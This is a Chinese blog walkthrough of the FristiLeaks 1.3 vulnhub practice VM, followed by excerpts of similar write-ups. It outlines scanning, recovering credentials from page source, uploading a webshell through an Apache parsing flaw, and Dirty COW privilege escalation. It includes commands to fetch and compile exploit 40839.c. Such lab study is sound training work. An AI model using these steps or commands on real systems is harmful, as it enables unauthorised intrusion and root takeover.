FristiLeaks_1.3靶机

最新推荐文章于 2024-12-29 20:34:24 发布
原创 最新推荐文章于 2024-12-29 20:34:24 发布 · 449 阅读 · 8 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全 #网络 #linux #运维 #安全

getshell

1.将FristiLeaks_1.3靶机mac地址改为08:00:27:A5:A6:76

2.nmap扫描主机

3.nmap扫描端口跟操作系统

4.访问80端口

5.先拼接robat.txt看看

6.拼接这三个路径

7.发现都是这个图片没有什么用,尝试扫描目录

8.没有什么发现,发现主页拼接/fristi有新页面

9.尝试了sql注入,爆破等没有成功,在源码中看看有什么信息

10.发现一个提示,表示对图片进行了编码和一个留言并发现一串base64编码

11.尝试将这个编码复制下来解密

12.发现他是png 直接把他重新输出到1.png并查看

13.将这个作为密码,用之前疑似用户名的留言者和这一串值进行登录,成功登录

14.可以发现有一个文件上传功能点

15.在这里看到他是apache的

16.直接通过apache解析漏洞上传图片

17.发现上传成功并根据提示保存到了/uploads目录下访问

18.蚁键连接

提权

1.将他上线到kali上

2.uname -a发现他是linux

3.尝试脏牛提权

searchsploit 'Dirty COW'

4.将40839.c下载到桌面上

searchsploit -m 40839.c

5.开启一个web服务让受害机下载他

6.赋予执行权限

7.编译

gcc -pthread 40839.c -o 40839 -lcrypt

8.运行

9.切换firefart用户

提权成功

左提溜
关注
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 429
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
Vulnhub靶机FristiLeaks_1.3
qq_48904485的博客
03-19 1281
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FristiLeaks 1.310.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2462
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 8664
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1175
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
FristiLeaks_1.3靶机复现
weixin_52956666的博客
08-01 480
输入searchspoilt -m linux/local/40839.c /home/kali/Desktop下载。发现没有可拼接的页面,端口也只开放了一个80端口,只能尝试拼接页面上的字段,拼接 fristi。设置网卡为NAT模式,并且将网卡改为 08:00:27:A5:A6:76 ,否则访问不到。靶机输入wget http://kali的IP:8000/40839.c下载。发现拼接成功,出现了后台登录页面,但是不知道账号密码,查看源码。上传失败,只能上传 png,jpg,gif 格式的文件。
vulnhub-FristiLeaks 1.3靶机
wjSteve的博客
09-15 783
如果网络配置没有问题,靶机在启动的时候就会直接显示自己的IP地址(这里显示在192.168.114.0网段,这是我的VMWare的NAT网卡网段,证明和kali在同一网段下)发现有两个登陆相关的php文件,还有一个uploads文件夹,说明这个网站可能时存在文件上传功能点的。署名是eezeepz,那么之前解出来的图片就有可能是密码,尝试在网站登陆一下。上传完成,访问文件,这里涉及到一个文件解析漏洞,访问成功即可。基本上是一些命令,有四个文件可以查看一下,比较有用的是这三个。
FristiLeaks_1.3靶机(看了不会滴滴作者)
zdd1453691081的博客
08-01 386
【代码】FristiLeaks_1.3靶机(看了不会滴滴作者)
【vulnhub】FristiLeaks_1.3靶机
weixin_62162207的博客
08-01 513
FristiLeaks_1.3靶机:打靶训练
FristiLeaks_1.3靶场渗透】
最新发布
一纸荒芜的博客
12-29 1136
FristiLeaks_1.3靶场渗透
FRISTILEAKS: 1.3超详细靶机实战
weixin_68615160的博客
08-01 1203
网卡设置为nat模式,并修改mac地址为开启虚拟机后IP地址在终端显示。
Vulnhub 渗透练习(七)—— FRISTILEAKS: 1.3
shinygod的博客
02-19 676
仔细阅读一些留言或者是解释。可以利用漏洞探针快速查询漏洞。脏牛的简单利用,及影响版本。
(Vulnhub练习)-- fristileaks渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-26 604
(Vulnhub练习)-- fristileaks渗透实战 下载地址 http://www.vulnhub.com/entry/fristileaks-13,133/ 目标主机IP:192.168.100.155 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null if [ $? -eq 0 ] ; then echo "$ip is
5.100个渗透测试实战#5(FristiLeaks_1.3
qwsn
03-25 3024
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)
网安学习
08-01 1195
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)-脏牛提权、SUDO提权
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 1127
网络安全,基础,靶场,信息安全,渗透测试,红队
靶机FristiLeaks_1.3
AzVoidSUN的博客
05-10 1007
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
FristiLeaks_1.3
cxyzupup的博客
01-10 899
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 570
Vulnhub—靶机FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值